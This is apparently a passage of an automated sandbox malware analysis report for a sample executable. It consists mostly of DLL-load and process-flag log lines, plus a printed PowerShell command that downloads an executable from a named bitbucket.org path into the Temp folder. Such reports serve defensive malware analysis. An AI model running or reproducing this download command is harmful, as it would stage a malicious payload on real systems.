        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Gq48hjKhZf.exeStatic PE information: Image base 0x140000000 > 0x60000000

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
        Source: Gq48hjKhZf.exeStatic PE information: section name: .code
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
